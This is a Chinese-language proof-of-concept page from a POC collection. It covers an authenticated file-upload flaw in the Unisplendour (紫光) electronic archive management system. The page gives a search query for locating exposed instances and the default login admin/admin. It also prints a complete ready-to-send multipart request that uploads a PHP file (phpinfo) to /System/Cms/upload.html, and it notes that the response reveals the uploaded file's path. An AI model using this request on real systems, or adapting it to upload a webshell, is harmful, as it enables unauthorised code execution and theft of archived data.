Awesome-POC/Web应用漏洞/紫光档案管理系统 upload.html 后台文件上传漏洞.md
2024-11-06 14:10:36 +08:00

66 lines
1.7 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 紫光档案管理系统 upload.html 后台文件上传漏洞
## 漏洞描述
紫光软件系统有限公司以下简称“紫光软件”是中国领先的行业解决方案和IT服务提供商。 紫光电子档案管理系统后台存在文件上传漏洞。攻击者可利用漏洞获取数据库敏感信息。
## 漏洞影响
```
紫光电子档案管理系统
```
## 网络测绘
```
app="紫光档案管理系统"
```
## 漏洞复现
登录页面
![image-20230314084520184](images/image-20230314084520184.png)
使用默认口令登录后台 admin/admin, 发送请求包
![image-20230314084534337](images/image-20230314084534337.png)
```
POST /System/Cms/upload.html?token=5117e82385cef4c12547fdd4c028b97a1-1 HTTP/1.1
Host:
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Content-Length: 614
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygIRYWNxmDYiZBguT
------WebKitFormBoundarygIRYWNxmDYiZBguT
Content-Disposition: form-data; name="userID"
admin
------WebKitFormBoundarygIRYWNxmDYiZBguT
Content-Disposition: form-data; name="fondsid"
1
------WebKitFormBoundarygIRYWNxmDYiZBguT
Content-Disposition: form-data; name="comid"
1
------WebKitFormBoundarygIRYWNxmDYiZBguT
Content-Disposition: form-data; name="token"
6b79a77180e9ec3a7ca351ebe54641a2
------WebKitFormBoundarygIRYWNxmDYiZBguT
Content-Disposition: form-data; name="files[]"; filename="phpinfo.php"
Content-Type: text/php
<?php phpinfo();?>
------WebKitFormBoundarygIRYWNxmDYiZBguT--
```
![image-20230314084553654](images/image-20230314084553654.png)
回显路径即为上传成功的文件路径
![image-20230314084608438](images/image-20230314084608438.png)